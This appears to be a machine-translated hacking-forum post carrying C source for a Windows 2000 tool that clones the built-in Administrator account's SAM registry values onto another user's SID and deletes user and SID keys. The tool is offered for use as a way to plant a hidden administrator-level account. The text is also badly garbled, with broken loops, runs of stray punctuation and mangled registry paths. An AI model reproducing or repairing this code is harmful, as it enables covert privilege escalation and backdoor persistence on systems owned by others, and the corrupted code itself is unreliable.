CloneDelete any user DAHUBAOBAO

CODZ:

#include #include char name [50] [30]; int key = 0; // OpenKey (), viewuser (), listuser () function The variable Void SID (CHAR * SID); // Delete Safety Identifier Void User (CHAR * User); / / Delete User Name Void Openkey; Int Viewuser (CHAR * Key); int Listuser (void ); // Display the security identifier INT clone (CHAR * C_SID); // Clone Account Void USAGE (Void); // Help Information Void Main (int Argc, char * argv []) {char SID [ 10]; char c_sid [10]; char user [40]; int N; for (n = 1; n

Case 'u': Case 'u': Printf ("" ",", ",";, ",",,,,,,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (Break;}}}} void sID (char * sid) {hkey hkey; dword ret; char c_sid [10]; zeromeMory (c_sid, 10); strcpy (c_sid, "00000"); // Pack the SID 5-bit strcat (c_sid, sid); // transmit the remaining 3 bits, and continue to populate // open the registry, success return value 0 (Success) RET = regopenkey (HKEY_LOCAL_MACHINE, / / ​​root key name, or the handle of open item " Sam // sam // Domains // Account // UserS // ", // To open item name & hkey); // Load the handle IF (RET == Error_Success); else return 0; // Delete SID , Success return value 0 (success) RET = RegdeleteKey (HKEY, C_SID); if (Ret == Error_Success) Printf ("Success Delete Key (SID) / N"); // Print Success Message Else { Printf ("Delete Key Fail (SID) / N"); // Print Failed Message Return 0;} RegcloseKey (HKEY); // Close User (Char * User)} Void User (CHAR * USER) {HKEY HKEY; DWORD Ret; char c_user [40]; zeromeMory (c_user, 40); strcpy (c_user, "); strcat (c_user, user); ret = regopenkey (hkey_local_machine," sam // sam // domains // account // users // Names // ", & hkey); if (ret == Error_Success); Else Return 0; Ret = RegdeleteKey (HKEY, C_USER); if (Ret ==

ERROR_SUCCESS) Printf ("Success Delete Key / N"); ELSE {Printf ("Delete Key Fail (User) / N"); Return 0;} RegcloseKey (HKEY);} Void OpenKey (char * key) { HKEY HKEY; DWORD DWINDEX = 0, LPCBNAME = 100, RET = 0; Char T_Name [100], Buffer [100]; Filetime Lpftlast; INT i = 0; ZeromeMory; ZeromeMory (T_Name, 100); ZeromeMory (Name, 1500); regopenkeyex (HKEY_LOCAL_MACHINE, / / ​​root key name or open handle key, // pass a parameter, the registry key 0, // unused, set to 0 Key_All_Access, / / One or more constants with prefix key_? //, their combination describes which operations allow for this item & HKEY); for (i = 0; RET == Error_suCcess; i , dwindex ) {RET = RegenumKeyex (HKEY, DWINDEX, T_NAME, & LPCBNAME, NULL, NULL, NULL, & LPFTLAST); // DWINDEX: The index of the child wants to get. The index number of the first child is zero // t_name: a buffer for loading the item name of the specified index // & lpcbname: Specifies a variable to load the actual length (including empty characters) of the LPNAME buffer.

/ / Once returned, it is set to the number of characters loaded to the LPNAME buffer // null: Unused, set to zero // Null: Item Used class name // null: One for loading LPCLASS buffer length Variable // & lpftlast: Filetime, the enumeration subkey last modified time strcat (name, t_name); zeromeMory (t_name, 100); lpcbname = 100;} regclosekey (HKEY); // Stitching User name for (Keyn = 0 Keyn "); Printf ("% s", TEMP); Viewuser (Buffer); strcpy (buffer, "sam // sam // domains // account // users // Names // ");} Return 1;

} int clone (char * c_SID) {HKEY HKEY, C_HKEY; DWORD TYPE = REG_BINARY, SIZEF = 1024 * 2, SizeV = 1024 * 10, Ret; Char Clones [100]; lpbyte lpdataf, lpdatav; lpdataf = (lpbyte) malloc; (1024 * 2); LPDATAV = (lpbyte) Malloc (1024 * 10); ZeromeMory (LPDATAF, 1024 * 2); ZeromeMory (LPDATAV, 1024 * 10); ZeromeMory (ClonesiD, 100); Strcpy (ClonesiD, "SAM / / Sam // domains // account // users // 00000 "); strcat (clonesid, c_sid); ret = regopenkeyex (hkey_local_machine," sam // sam // Domains // Account //////101f4 ", 0 , Key_all_access, & hkey); if (RET == Error_Success); Else Return 0; Ret = RegQueryValueex (HKEY, "F", NULL, & TYPE, LPDATAF, & SIZEF); if (Ret == Error_Success); Else Return 0; Ret = RegQueryValueex (HKEY, "V", NULL, & TYPE, LPDATAV, & SIZEV); if (RET == Error_Success); Else Return 0; ret = RegOpenKeyEx (HKEY_LOCAL_MACHINE, CloneSid, 0, KEY_ALL_ACCESS, & C_hkey); if (ret == ERROR_SUCCESS); else return 0; ret = RegSetValueEx (C_hkey, "F", 0, REG_BINARY, lpDataF, SizeF); // C_hkey: The root key name or open item handle // "f": Name // 0: Unused, set to zero // reg_binary: The number of types to set // lpdataf: contains data buffer The first byte // sizef: length IF of the LPDATA buffer (RET == Error_Success);

Else Return 0; RET = RegSetValueex (C_HKEY, "V", 0, REG_BINARY, LPDATAV, SIZEV); if (RET == Error_Success) Printf ("Clone User Success / N"); Else {Printf ("Clone User Fail / N "); return 0;} regclosekey (hkey); regclosekey (c_hKey); return 1; void usage (void) {fprintf (stderr," ================= ============================================================================================================================================================================================================= ============ / n "" / t clone / delete any user / n "" / t environment: Win2K Adv Server Visual C 6.0 / n "" / t author: dahubaobao / n " "/ T home page: www.ringz.org/n " / toicq: 47809945 / n "" / Tone: dahubaobao@hotmail.com/n "" / t declaration: this post was originally created by the loop (Ringz), reproduced, please indicate the source, thank you! / n "" / n "" / t method: / n " "/ t /" - h / ": Help information / n" "/ t /": lists the SID / N "" / t / "- c /": cloning account, input SID can / n "" / t / "- s /": delete SID / N ""